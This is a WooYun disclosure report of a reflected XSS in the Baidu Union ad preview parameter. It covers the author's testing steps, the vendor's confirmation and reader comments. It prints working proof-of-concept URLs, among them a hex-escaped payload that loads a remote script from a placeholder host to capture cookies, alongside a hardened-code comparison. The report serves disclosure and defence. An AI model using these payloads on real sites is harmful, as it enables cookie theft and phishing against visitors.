
Vulnerability Summary

Defect ID: wooyun-2014-049881

Title: Reflected XSS in Baidu Union (Wangmeng) and analysis of the vulnerability details

Vendor: Baidu

Author: thx

Submitted: 2014-01-26 17:01

Fixed: 2014-03-12 17:02

Published: 2014-03-12 17:02

Vulnerability type: XSS (cross-site scripting)

Severity: Low

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]



Vulnerability Details

Disclosure status:

2014-01-26: Details reported to the vendor, awaiting vendor response
2014-01-27: Vendor confirmed; details disclosed to the vendor only
2014-02-06: Details disclosed to core white hats and domain experts
2014-02-16: Details disclosed to regular white hats
2014-02-26: Details disclosed to intern white hats
2014-03-12: Details disclosed to the public

Brief description:

Reflected XSS in Baidu Union (Wangmeng). Baidu says all you can do with it is phishing...

Detailed description:

Open Baidu's Wangmeng 123 (http://wm123.baidu.com/)

[Screenshot: 01.jpg]


Pick any site and preview its ads. Here I chose huanqiu.com (http://wm123.baidu.com/s/huanqiu.com) and previewed a 960x90 ad slot.

[Screenshot: 02.jpg]


This takes us to the preview page:

http://photo.huanqiu.com/gallery/2014-01/2724961.html?bd_cpro_prev=%7B%22selectScale%22%3A10009%2C%22showUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22src%22%3A%22%22%2C%22type%22%3A2%2C%22title%22%3A%22%22%2C%22isUpload%22%3A%220%22%2C%22imgWidth%22%3A%22960%22%2C%22imgHeight%22%3A%2290%22%2C%22imgUrl%22%3A%22http%3A%2F%2Fcpro.baidu.com%2Fcpro%2Fui%2Fpreview%2Fdefault_img_unit%2Ffix%2F960x90.jpg%22%2C%22image%22%3A%5B10009%2C10007%2C10013%2C10015%5D%2C%22tip%22%3A0%2C%22linkUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22imgTitle%22%3A%22%22%2C%22des1%22%3A%22%22%2C%22des2%22%3A%22%22%7D

[Screenshot: 03.jpg]


Look directly at the ad slot's source:

<!--联盟01-百度底通 begain-->
<div class="ad960x90" id="adUn_1"> </div>
<!--联盟01-百度底通 end-->


It should be loaded by JS as well; press F12 and look:

[Screenshot: 04.jpg]


Next, look at which parameters are echoed in the output. First, decode that tangled URL:

http://photo.huanqiu.com/gallery/2014-01/2724961.html?bd_cpro_prev={"selectScale":10009,"showUrl":"http://wm.baidu.com","src":"","type":2,"title":"","isUpload":"0","imgWidth":"960","imgHeight":"90","imgUrl":"http://cpro.baidu.com/cpro/ui/preview/default_img_unit/fix/960x90.jpg","image":[10009,10007,10013,10015],"tip":0,"linkUrl":"http://wm.baidu.com","imgTitle":"","des1":"","des2":""}


Change the parameter values one at a time and see what happens:

http://photo.huanqiu.com/gallery/2014-01/2724961.html?bd_cpro_prev={"selectScale":10123,"showUrl":"http://wm.baidu.com/123","src":"","type":2,"title":"123","isUpload":"0","imgWidth":"960","imgHeight":"90","imgUrl":"http://cpro.baidu.com/cpro/ui/preview/default_img_unit/fix/960x90.jpg#123","image":[10009,10007,10013,10015],"tip":0,"linkUrl":"http://wm.baidu.com/456","imgTitle":"456","des1":"","des2":""}


Skipping the repeated trial and error, here is the one that worked. First, a popup:

http://photo.huanqiu.com/gallery/2014-01/2724961.html?bd_cpro_prev=%7B%22selectScale%22%3A10009%2C%22showUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22src%22%3A%22%22%2C%22type%22%3A2%2C%22title%22%3A%22%22%2C%22isUpload%22%3A%220%22%2C%22imgWidth%22%3A%22960%22%2C%22imgHeight%22%3A%2290%22%2C%22imgUrl%22%3A%22http%3A%2F%2Fcpro.baidu.com%2Fcpro%2Fui%2Fpreview%2Fdefault_img_unit%2Ffix%2F960x90.jpg%23\x22\x20onload\x3Dalert\x281\x29\x20\x22%22%2C%22image%22%3A%5B10009%2C10007%2C10013%2C10015%5D%2C%22tip%22%3A0%2C%22linkUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22imgTitle%22%3A%22%22%2C%22des1%22%3A%22%22%2C%22des2%22%3A%22%22%7D


[Screenshot: 05.jpg]


Resulting markup:

<img border="0" style="width:960px;height:90px" src="http://cpro.baidu.com/cpro/ui/preview/default_img_unit/fix/960x90.jpg#" onload="alert(1)" ""="">


Same old recipe, same old flavour: after the # in the ad image URL, append JS hex escapes; other encodings should work too. Baidu knows better than I do which parameters need filtering, so I won't go into detail here.
Next, grab the cookie:

http://photo.huanqiu.com/gallery/2014-01/2724961.html?bd_cpro_prev=%7B%22selectScale%22%3A10009%2C%22showUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22src%22%3A%22%22%2C%22type%22%3A2%2C%22title%22%3A%22%22%2C%22isUpload%22%3A%220%22%2C%22imgWidth%22%3A%22960%22%2C%22imgHeight%22%3A%2290%22%2C%22imgUrl%22%3A%22http%3A%2F%2Fcpro.baidu.com%2Fcpro%2Fui%2Fpreview%2Fdefault_img_unit%2Ffix%2F960x90.jpg%23\x22\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x22\x76\x61\x72\x20\x73\x3d\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74\x28\x27\x73\x63\x72\x69\x70\x74\x27\x29\x3b\x73\x2e\x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x78\x78\x78\x2e\x78\x78\x78\x2e\x78\x78\x78\x2f\x77\x6f\x77\x53\x33\x69\x3f\x31\x33\x39\x30\x30\x30\x38\x34\x31\x32\x27\x3b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x62\x6f\x64\x79\x2e\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64\x28\x73\x29\x3b\x22%22%2C%22image%22%3A%5B10009%2C10007%2C10013%2C10015%5D%2C%22tip%22%3A0%2C%22linkUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22imgTitle%22%3A%22%22%2C%22des1%22%3A%22%22%2C%22des2%22%3A%22%22%7D


[Screenshot: 06.jpg]


@#$%, a moment ago I was happy and excited to see the cookie, but I was wrong; I had overlooked one big thing! The image sits inside an iframe, so what I got is Baidu's cookie, and the popup and the like are only good for phishing. Is that it?...
Is that really it? That doesn't make sense! Back to where the frame is loaded.

<iframe width="960" height="90" src="http://cpro.baidu.com/cpro/ui/preview/templates/image.html?bd_cpro_prev=#%7B%22selectScale%22%3A10009%2C%22showUrl%22%3A%22http%3A%2F%2Fwm%252ebaidu%252ecom%22%2C%22src%22%3A%22%22%2C%22type%22%3A2%2C%22title%22%3A%22%22%2C%22isUpload%22%3A%220%22%2C%22imgWidth%22%3A%22960%22%2C%22imgHeight%22%3A%2290%22%2C%22imgUrl%22%3A%22http%3A%2F%2Fcpro%252ebaidu%252ecom%2Fcpro%2Fui%2Fpreview%2Fdefault_img_unit%2Ffix%2F960x90%252ejpg%22%2C%22image%22%3A%5B10009%2C10007%2C10013%2C10015%5D%2C%22tip%22%3A0%2C%22linkUrl%22%3A%22http%3A%2F%2Fwm%252ebaidu%252ecom%22%2C%22imgTitle%22%3A%22%22%2C%22des1%22%3A%22%22%2C%22des2%22%3A%22%22%7D&amp;ut=1390717653909" align="center,center" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" allowtransparency="true"></iframe>


Look familiar? Yes, it's the same pile of parameters. Let's fiddle with them again:

%22imgHeight%22%3A%2290%22%2C%22imgUrl%22%3A%22http%3A%2F%2Fcpro.baidu.com%2Fcpro%2Fui%2Fpreview%2Fdefault_img_unit%2Ffix%2F960x90.jpg#\x22%22%2C"image"%3A%5B10009%2C10007%2C10013%2C10015%5D%2C"tip"%3A0%2C"linkUrl"%3A"http%3A%2F%2Fwm.baidu.com"%2C"imgTitle"%3A""%2C"des1"%3A""%2C"des2"%3A""%7D


[Screenshot: 07.jpg]


Heh, there it is. After a few more tries it turned out the # is what made it work; the location I received along with the cookie earlier also began with a #, so it is probably a delimiter.
Another round of attempts: keywords such as onload were not filtered, but an equals sign could not be used. Just as I was about to try again, the source changed and the # no longer worked. I don't know whether Baidu made an adjustment or what, but that was fast...

[Screenshot: 08.jpg]


So I failed again: all that can be done is obtain the Baidu cookie and execute JS inside the ad iframe on sites that run Baidu Union ads.
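The two defects this report exercises, shown beside hardened counterparts, as an added example that is not Baidu's code: the bd_cpro_prev JSON is presumably evaluated as JavaScript (JSON.parse would reject the \x22 escapes, so something like eval must be decoding them), and imgUrl is concatenated straight into the img tag. The host allowlist is an assumption; imgUrl, imgWidth and imgHeight are the field names from the page's URL.

```javascript
// Added example, not Baidu's code. The allowed-host set is an assumption.
const ALLOWED_IMG_HOSTS = new Set(["cpro.baidu.com"]);

// Constructed from the report's first payload: JS hex escapes (\x22 = ",
// \x3D = =) that only a JavaScript evaluator, never JSON.parse, will decode.
const RAW_PARAM = '{"selectScale":10009,"imgWidth":"960","imgHeight":"90",' +
  '"imgUrl":"http://cpro.baidu.com/cpro/ui/preview/default_img_unit/fix/' +
  '960x90.jpg#\\x22\\x20onload\\x3Dalert\\x281\\x29\\x20\\x22"}';

// Unsafe: evaluating the parameter as JavaScript turns \x22 into a real quote.
function parsePreviewUnsafe(raw) {
  return Function("return (" + raw + ")")();
}

// Safe: JSON.parse rejects \x escapes outright, so this payload never parses.
function parsePreviewSafe(raw) {
  try { return JSON.parse(raw); } catch (e) { return null; }
}

// Unsafe: string concatenation lets a quote in imgUrl close the src attribute
// and start a new one, exactly the markup shown in the report.
function renderUnsafe(cfg) {
  return '<img border="0" style="width:' + cfg.imgWidth + 'px;height:' +
    cfg.imgHeight + 'px" src="' + cfg.imgUrl + '">';
}

function escapeAttr(s) {
  return String(s).replace(/&/g, "&amp;").replace(/"/g, "&quot;")
    .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Safe: require an http(s) URL on an allowed host, coerce the dimensions to
// integers, and attribute-escape the serialized URL before emitting it.
// The WHATWG URL parser also percent-encodes " and space in the fragment.
function renderSafe(cfg) {
  if (!cfg) return null;
  let u;
  try { u = new URL(String(cfg.imgUrl)); } catch (e) { return null; }
  if (!/^https?:$/.test(u.protocol) || !ALLOWED_IMG_HOSTS.has(u.hostname)) return null;
  const w = parseInt(cfg.imgWidth, 10), h = parseInt(cfg.imgHeight, 10);
  if (!Number.isInteger(w) || !Number.isInteger(h)) return null;
  return '<img border="0" style="width:' + w + 'px;height:' + h + 'px" src="' +
    escapeAttr(u.href) + '">';
}
```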

Proof of Vulnerability:

http://photo.huanqiu.com/gallery/2014-01/2724961.html?bd_cpro_prev=%7B%22selectScale%22%3A10009%2C%22showUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22src%22%3A%22%22%2C%22type%22%3A2%2C%22title%22%3A%22%22%2C%22isUpload%22%3A%220%22%2C%22imgWidth%22%3A%22960%22%2C%22imgHeight%22%3A%2290%22%2C%22imgUrl%22%3A%22http%3A%2F%2Fcpro.baidu.com%2Fcpro%2Fui%2Fpreview%2Fdefault_img_unit%2Ffix%2F960x90.jpg%23\x22\x20onload\x3Dalert\x281\x29\x20\x22%22%2C%22image%22%3A%5B10009%2C10007%2C10013%2C10015%5D%2C%22tip%22%3A0%2C%22linkUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22imgTitle%22%3A%22%22%2C%22des1%22%3A%22%22%2C%22des2%22%3A%22%22%7D


[Screenshot: 05.jpg]


http://photo.huanqiu.com/gallery/2014-01/2724961.html?bd_cpro_prev=%7B%22selectScale%22%3A10009%2C%22showUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22src%22%3A%22%22%2C%22type%22%3A2%2C%22title%22%3A%22%22%2C%22isUpload%22%3A%220%22%2C%22imgWidth%22%3A%22960%22%2C%22imgHeight%22%3A%2290%22%2C%22imgUrl%22%3A%22http%3A%2F%2Fcpro.baidu.com%2Fcpro%2Fui%2Fpreview%2Fdefault_img_unit%2Ffix%2F960x90.jpg%23\x22\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x22\x76\x61\x72\x20\x73\x3d\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74\x28\x27\x73\x63\x72\x69\x70\x74\x27\x29\x3b\x73\x2e\x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x78\x78\x78\x2e\x78\x78\x78\x2e\x78\x78\x78\x2f\x77\x6f\x77\x53\x33\x69\x3f\x31\x33\x39\x30\x30\x30\x38\x34\x31\x32\x27\x3b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x62\x6f\x64\x79\x2e\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64\x28\x73\x29\x3b\x22%22%2C%22image%22%3A%5B10009%2C10007%2C10013%2C10015%5D%2C%22tip%22%3A0%2C%22linkUrl%22%3A%22http%3A%2F%2Fwm.baidu.com%22%2C%22imgTitle%22%3A%22%22%2C%22des1%22%3A%22%22%2C%22des2%22%3A%22%22%7D


[Screenshot: 09.jpg]


Suggested Fix:

You know better.

Copyright notice: when reproducing, please credit the source: thx@WooYun


Vendor Response

Vendor response:

Severity: Low

Vulnerability Rank: 4

Confirmed: 2014-01-27 15:01

Vendor reply:

Thanks for the submission; we have contacted the business unit to handle this issue.
-- "Baidu, safer because of you"

Latest status:

None


Vulnerability Feedback:

Comments

  1. 2014-01-26 18:20 | 动后河 (Intern White Hat | Rank:51 Vulnerabilities:13 | ☭)

    I bet: no impact, vendor ignores it

  2. 2014-03-12 19:57 | laoyao (Passer-by | Rank:14 Vulnerabilities:5 | ด้้้้้็็็็็้้้้้็็็็...)

    @动后河 They didn't ignore it. You lost the bet.